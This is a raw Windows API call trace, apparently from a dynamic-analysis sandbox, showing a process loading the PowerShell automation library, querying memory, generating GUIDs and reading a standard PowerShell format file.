	[0094.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.505] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.505] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.505] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.506] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.506] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.507] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.507] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.507] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.508] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.508] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.508] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.508] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.509] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.509] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.509] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.510] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.510] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.510] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.510] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.510] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xb58bc4c4, Data2=0x5292, Data3=0x4027, Data4=([0]=0x80, [1]=0x65, [2]=0x0, [3]=0x87, [4]=0xc6, [5]=0x1d, [6]=0x86, [7]=0x59))) returned 0x0
	[0094.511] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.511] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.511] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.511] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.512] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.512] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.512] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.512] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.513] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.513] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.513] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.514] VirtualQuery (in: lpAddress=0x16bea0, lpBuffer=0x16cd60, dwLength=0x30 | out: lpBuffer=0x16cd60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.514] VirtualQuery (in: lpAddress=0x16bf30, lpBuffer=0x16cdf0, dwLength=0x30 | out: lpBuffer=0x16cdf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.514] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.514] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.515] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.515] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.515] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.515] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.516] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.516] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x31b97323, Data2=0xd341, Data3=0x471e, Data4=([0]=0x9c, [1]=0x54, [2]=0xe7, [3]=0xc8, [4]=0xfa, [5]=0x53, [6]=0x5b, [7]=0x54))) returned 0x0
	[0094.516] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.516] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.517] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.517] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.517] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.517] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.517] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.518] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.518] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.518] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.518] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.518] VirtualQuery (in: lpAddress=0x16bb60, lpBuffer=0x16ca20, dwLength=0x30 | out: lpBuffer=0x16ca20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.519] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.519] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.519] VirtualQuery (in: lpAddress=0x16be90, lpBuffer=0x16cd50, dwLength=0x30 | out: lpBuffer=0x16cd50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.519] VirtualQuery (in: lpAddress=0x16bf20, lpBuffer=0x16cde0, dwLength=0x30 | out: lpBuffer=0x16cde0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.519] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x252032e8, Data2=0x5d04, Data3=0x4083, Data4=([0]=0x85, [1]=0x6d, [2]=0x47, [3]=0x54, [4]=0x9e, [5]=0x22, [6]=0x5, [7]=0x83))) returned 0x0
	[0094.520] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x15d4dae, Data2=0x40f9, Data3=0x401f, Data4=([0]=0xab, [1]=0xa8, [2]=0xbe, [3]=0xa9, [4]=0xd9, [5]=0x56, [6]=0x79, [7]=0xf8))) returned 0x0
	[0094.520] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x33c26f2f, Data2=0xcbfa, Data3=0x4b0f, Data4=([0]=0x83, [1]=0x2c, [2]=0x69, [3]=0x9c, [4]=0x9b, [5]=0xff, [6]=0x71, [7]=0xbf))) returned 0x0
	[0094.521] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x7276d6ab, Data2=0x2437, Data3=0x4ae9, Data4=([0]=0x81, [1]=0xdd, [2]=0x98, [3]=0x47, [4]=0xcb, [5]=0x7f, [6]=0x8a, [7]=0x78))) returned 0x0
	[0094.521] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xeaf5b16c, Data2=0xf6eb, Data3=0x427a, Data4=([0]=0xa4, [1]=0xa6, [2]=0xc5, [3]=0x3, [4]=0x61, [5]=0x5, [6]=0xea, [7]=0xb2))) returned 0x0
	[0094.522] VirtualQuery (in: lpAddress=0x16bc70, lpBuffer=0x16cb30, dwLength=0x30 | out: lpBuffer=0x16cb30*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.522] VirtualQuery (in: lpAddress=0x16bd00, lpBuffer=0x16cbc0, dwLength=0x30 | out: lpBuffer=0x16cbc0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.522] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0xf023fbe5, Data2=0x3e0a, Data3=0x4d6c, Data4=([0]=0xbb, [1]=0xf2, [2]=0xf2, [3]=0x2e, [4]=0xe9, [5]=0xf6, [6]=0xad, [7]=0x72))) returned 0x0
	[0094.522] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2bb7f507, Data2=0x97b8, Data3=0x4c5a, Data4=([0]=0xaa, [1]=0x35, [2]=0x93, [3]=0x88, [4]=0xc5, [5]=0x96, [6]=0xd7, [7]=0xfb))) returned 0x0
	[0094.522] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x2c29fe5f, Data2=0xbe59, Data3=0x40c0, Data4=([0]=0x80, [1]=0xa2, [2]=0xbd, [3]=0xcd, [4]=0x36, [5]=0xfa, [6]=0x51, [7]=0x86))) returned 0x0
	[0094.523] SetErrorMode (uMode=0x1) returned 0x1
	[0094.523] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0094.523] SetErrorMode (uMode=0x1) returned 0x1
	[0094.524] GetFileType (hFile=0x338) returned 0x1
	[0094.524] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.525] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.525] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.525] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.525] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.526] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.526] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
	[0094.526] ReadFile (in: hFile=0x338, lpBuffer=0x3b4a268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d458, lpOverlapped=0x0 | out: lpBuffer=0x3b4a268*, lpNumberOfBytesRead=0x16d458*=0x1000, lpOverlapped=0x0) returned 1
